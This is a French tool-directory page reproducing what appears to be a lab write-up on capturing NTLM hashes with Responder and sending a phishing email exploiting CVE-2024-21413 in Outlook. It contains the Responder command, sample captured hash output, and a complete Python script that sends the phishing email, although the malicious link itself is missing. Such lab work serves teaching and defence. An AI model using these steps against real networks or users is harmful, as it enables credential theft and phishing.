Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413
OSINT (Renseignement de Sources Ouvertes)Cassage de Mots de PasseReconnaissanceExploitationHameçonnageIngénierie SocialeApprentissage et ÉducationLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub
artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413

Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413

Démontre la capture de hachages NTLM via Responder et l'exécution d'e-mails de phishing exploitant CVE-2024-21413 pour compromettre des systèmes.

Voir le dépôt
8il y a 1 anPas encore vérifié
Partager

Objectif du projet : Ce projet a été créé pour démontrer l'utilisation de divers outils pour capturer des hachages NTLM d'utilisateurs sur un réseau et pour exécuter des attaques de phishing par email. Cela montre comment les vulnérabilités d'authentification réseau et les méthodes de phishing peuvent être exploitées pour compromettre des systèmes.

Description du processus

  1. Capture des hachages NTLM avec Responder Initialement, j'ai utilisé l'outil Responder pour capturer des hachages d'authentification sur le réseau. Responder permet d'intercepter des requêtes telles que LLMNR, NBT-NS et MDNS pour collecter les hachages NTLM des utilisateurs. Il s'agit d'une étape importante pour les attaques visant à obtenir un accès aux systèmes à l'aide de hachages capturés.

J'ai exécuté la commande suivante pour lancer Responder :

root@ip-10-10-192-145:~# sudo responder -I ens5

J'ai configuré Responder pour écouter sur l'interface ens5. Il a immédiatement commencé à intercepter les requêtes d'authentification, ce qui m'a permis de visualiser les hachages NTLM des utilisateurs sur le réseau, tels que THM-MONIKERLINK\tryhackme et WORKGROUP\Administrator. Voici à quoi ressemblait la sortie lors de la capture des hachages :

[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB

Ces hachages peuvent ensuite être utilisés pour des attaques telles que le brute force ou les attaques par hachage.

  1. Emails de phishing avec exploit Ensuite, j'ai créé un email de phishing contenant un lien vers un fichier malveillant. En utilisant un script Python avec la bibliothèque smtplib, j'ai envoyé l'email à l'adresse de la victime. L'email contenait un lien HTML qui semblait sûr mais menait en réalité à un fichier conçu pour exploiter une vulnérabilité.

Le lien de phishing dans l'email ressemblait à ceci :

Click me

Voici le script Python complet utilisé pour envoyer l'email de phishing :

import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr

sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")

html_content = """\

"""

Click me

message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email

msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)

server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()

try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)

try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()

Ce script envoie un email avec un lien malveillant, qui pourrait potentiellement exploiter la vulnérabilité CVE-2024-21413.

Résultats En conséquence, j'ai pu démontrer deux aspects clés :

  • La capture des hachages NTLM à l'aide de l'outil Responder, une étape cruciale pour attaquer l'authentification réseau.
  • Le phishing et l'exploitation de vulnérabilités via email à l'aide du script Python. L'envoi d'emails de phishing avec des liens malveillants peut tromper les utilisateurs et conduire à un compromis du système.

Ce projet a montré comment les vulnérabilités réseau et les attaques de phishing peuvent être exploitées pour accéder aux systèmes. Il a également souligné l'importance de se défendre contre de telles attaques grâce à des méthodes d'authentification fortes et au filtrage du trafic email.

Télécharger l’outil